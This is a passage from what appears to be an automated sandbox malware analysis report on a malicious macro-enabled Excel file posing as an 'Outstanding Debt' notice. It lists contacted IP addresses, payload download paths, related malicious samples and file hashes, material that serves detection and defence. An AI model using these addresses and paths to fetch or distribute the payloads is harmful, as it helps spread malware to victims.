                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                185.183.99.115
                                                                                                                                                unknownNetherlands
                                                                                                                                                60117HSAEfalse
                                                                                                                                                51.89.73.159
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                190.14.37.38
                                                                                                                                                unknownPanama
                                                                                                                                                52469OffshoreRacksSAPAfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:404162
                                                                                                                                                Start date:04.05.2021
                                                                                                                                                Start time:19:11:59
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 56s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:Outstanding-Debt-1840996632-05042021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:25
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.expl.evad.winXLSM@1/9@0/3
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.42.151.234, 92.122.145.220, 52.109.32.63, 52.109.88.37, 52.109.8.24, 13.64.90.137, 168.61.161.212, 23.57.80.111, 20.82.210.154, 92.122.213.194, 92.122.213.247, 205.185.216.10, 205.185.216.42, 20.54.26.129
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                185.183.99.115Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115/44313,6048108796.dat
                                                                                                                                                51.89.73.159Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159/44313,6048108796.dat
                                                                                                                                                190.14.37.38Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38/44313,6048108796.dat

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                OffshoreRacksSAPAOutstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.38
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.36
                                                                                                                                                Cancellation-419022185-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.27
                                                                                                                                                Cancellation-419022185-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.27
                                                                                                                                                Cancellation-419022185-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.27
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.252
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.252
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 190.14.37.252
                                                                                                                                                HSAEOutstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.183.99.115
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.45.193.80
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.198.57.121
                                                                                                                                                kVXWdr5oFQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.36
                                                                                                                                                t.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.141.27.225
                                                                                                                                                SSuPgxqQBv.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.36
                                                                                                                                                sGdpcwaC54.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                sGdpcwaC54.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                ccriZ1jd8H.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.147
                                                                                                                                                SecuriteInfo.com.Trojan.GenericKD.36392080.3322.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.156
                                                                                                                                                0304_87496944093261.docGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                0304_56958375050481.docGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                Static.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                Static.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                msals.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.183.96.157
                                                                                                                                                OVHFROutstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159
                                                                                                                                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.89.73.159
                                                                                                                                                New Order Request_0232147.exeGet hashmaliciousBrowse
                                                                                                                                                • 149.202.85.210
                                                                                                                                                Transcation03232016646pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 79.137.109.121
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                MZyeln5mSFOjxMx.exeGet hashmaliciousBrowse
                                                                                                                                                • 66.70.204.222
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 51.77.73.218
                                                                                                                                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                d192feb6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                7bc33f1c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                448b5d7d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13
                                                                                                                                                7bc33f1c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.113.13

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FAE18253-8CFD-4E3D-BC35-FFFD7833E115
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134558
                                                                                                                                                Entropy (8bit):5.368388305180555
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ncQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:MEQ9DQW+zPXO8
                                                                                                                                                MD5:611EBE91BBBD99D355DAF81A6E7DCAC5
                                                                                                                                                SHA1:44F79E65DD2A30D69F880B4D29A1E8E5CAF3CC7C
                                                                                                                                                SHA-256:323A9C8BF4ACD185973F3370311B7DD38037A5B3F35685365E62B5D9207DE88F
                                                                                                                                                SHA-512:A13838D119E7BC86BCC2AFCFFC721FC92FA590D52134D46B1921F42157315112EDEBC64143555172AF3553051967284266D44A1386C0BC67F9D9F013ED276350
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T17:16:05">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F689363C.jpg
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92379
                                                                                                                                                Entropy (8bit):7.654577060340879
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                C:\Users\user\AppData\Local\Temp\23B10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119781
                                                                                                                                                Entropy (8bit):7.698563389587459
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:P5RSrvKINbjvw548LMb/oqKO8NnS8+60Kcq:RR7AbT648LM7D98Np+Ep
                                                                                                                                                MD5:A1936D6FBB3EB18E0050C0F1FC57DEE9
                                                                                                                                                SHA1:55066C92053957F35FCD3F79E821907C5DB8D2CE
                                                                                                                                                SHA-256:9B723BCE1BDFBDFC8A07C828D0BBBCE238963B06614620F6C120B50581FF8421
                                                                                                                                                SHA-512:8F61A4082960C743D43AF1F86BCA1A45A6C38EE000912E79C7DB843537528ECC416587E3CFB78F8403DF37AC7420B70C76C441ED53F9B2B9AD2A392B954296EA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):170164
                                                                                                                                                Entropy (8bit):4.366501051489385
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:fP5vvvzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:f1M8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                MD5:10FC429A9AE4B5348B5F32F6FD4B2C1F
                                                                                                                                                SHA1:F57A5A19E5534713CCC5F1B6170CD77EBBF27398
                                                                                                                                                SHA-256:0B4F03EFE87158E75D21F1C6BA744705BEEC40E8CA65FFFDFA48FEA69C85F05F
                                                                                                                                                SHA-512:0D6DC75CC26D9322F6502DAC1E83E24FB9D31C8E2DA0A6FCDC6FE798F8EF2CB6E14B6527BB5D43DE224686F137D46FC3CD39B7FAEED1D6ABDF694EB000A5137D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed May 5 01:16:12 2021, atime=Wed May 5 01:16:12 2021, length=12288, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):904
                                                                                                                                                Entropy (8bit):4.668642985848694
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8QtXU9UMcuElPCH2agPXtSEsk+WrjAZ/2bDBLC5Lu4t2Y+xIBjKZm:8QrkgPIE7AZiD487aB6m
                                                                                                                                                MD5:E18822F992569E581ADAC8946F7EBAB3
                                                                                                                                                SHA1:E3B7DD4604B240FDEDCE9602CB99699C6BBA3B90
                                                                                                                                                SHA-256:A920432859070D159629558BE9BABD65D6B689028EE4EF6AA25065EF36CED62A
                                                                                                                                                SHA-512:97FC97862390CCD017F5AA714013BE86D6EE8FDFFC7689D78DBD6A72B033E66314F57F43E19575D5BCE585327B6D82BCBED60D859E5C9DD5F41DB770FEC1EDF1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F........N....-.....TA...'.TA...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qzx..user.<.......Ny..R.......S....................Y...h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......468325...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1840996632-05042021.xlsm.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:47 2020, mtime=Wed May 5 01:16:12 2021, atime=Wed May 5 01:16:12 2021, length=119775, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2380
                                                                                                                                                Entropy (8bit):4.713963947501717
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:82VkgP5OZ6EyA/ujZ64DaOS+7aB6my2VkgP5OZ6EyA/ujZ64DaOS+7aB6m:82fu64/W6FOS3B6p2fu64/W6FOS3B6
                                                                                                                                                MD5:F2F8E7CD5F81F1791686F7617E59CB0F
                                                                                                                                                SHA1:62AB1A77C81F24EAAD06C80B724F809E5F8641EC
                                                                                                                                                SHA-256:CE497CBEC83B032A2DD5371E6742B674E5A13E3C439179865EE6A83174A58597
                                                                                                                                                SHA-512:04BDAB6927C09A353C123339B9B9F1A8B00BF8E90655C3474D6360837DEB7FDC98FF6797396215669FD4668FA973A1D6FE09167C25C6FADCB44A1F8D5FFB5A56
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ....b0.:....N.TA...N.TA...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qzx..user.<.......Ny..R.......S....................Y...h.a.r.d.z.....~.1.....>Q{x..Desktop.h.......Ny..R.......Y..............>.......|.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....R.. .OUTSTA~1.XLS.........>Qxx.R......h........................O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.8.4.0.9.9.6.6.3.2.-.0.5.0.4.2.0.2.1...x.l.s.m.......o...............-.......n...........>.S......C:\Users\user\Desktop\Outstanding-Debt-1840996632-05042021.xlsm..@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.8.4.0.9.9.6.6.3.2.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......468325...........!a..%.H.VZAj...&..-.........-..!a..%.H.VZAj...&..-.........-.............1SPS.XF.L8C
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):178
                                                                                                                                                Entropy (8bit):5.000732257117073
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomxWhl2BbmXIVa+lpSyEW92BbmXIVa+lpSmxWhl2BbmXIVa+lpSv:djSl2poW92psl2pc
                                                                                                                                                MD5:BAD8EE5236230B561F4D4C3E161F2F6D
                                                                                                                                                SHA1:CFDE56C8A01AEE7B9849E2124CED0759E25665D4
                                                                                                                                                SHA-256:A5781EF8F9A091159A6E15E4177F54FB91950789620877C148DBF6F7E574C072
                                                                                                                                                SHA-512:9FCFBDD052FFECCF43F265E4F67E15D98F2339EDAFF22EDC5F9AA30077D8456D198E76E27F6B11695E36DE9687F01D6766E192F82DA5183214EB048E57B318AD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1840996632-05042021.xlsm.LNK=0..Outstanding-Debt-1840996632-05042021.xlsm.LNK=0..[misc]..Outstanding-Debt-1840996632-05042021.xlsm.LNK=0..
                                                                                                                                                C:\Users\user\Desktop\E3B10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119775
                                                                                                                                                Entropy (8bit):7.699257049186271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:x88vKINbjvw548LMb/oqKO8NnS8+60KcC:xGAbT648LM7D98Np+Ed
                                                                                                                                                MD5:9B1EEE67A8B8894E0461820241EB8B83
                                                                                                                                                SHA1:3F9CB90972FE2A97D4268E44EF1061F7728DEEE2
                                                                                                                                                SHA-256:BB783D326EA45620B2FDD44F1DBACDA095361BF6E8130625BC1BA4522C204091
                                                                                                                                                SHA-512:E224CEDC7D413FFA6474D2E055D771DC96B88A89E248877751D7D40B932BEAE76E830BBAC014C0149D81990A2165696C1F5514B577396E81DDEB5CCEEFDA8D86
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Outstanding-Debt-1840996632-05042021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.688088272020875
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
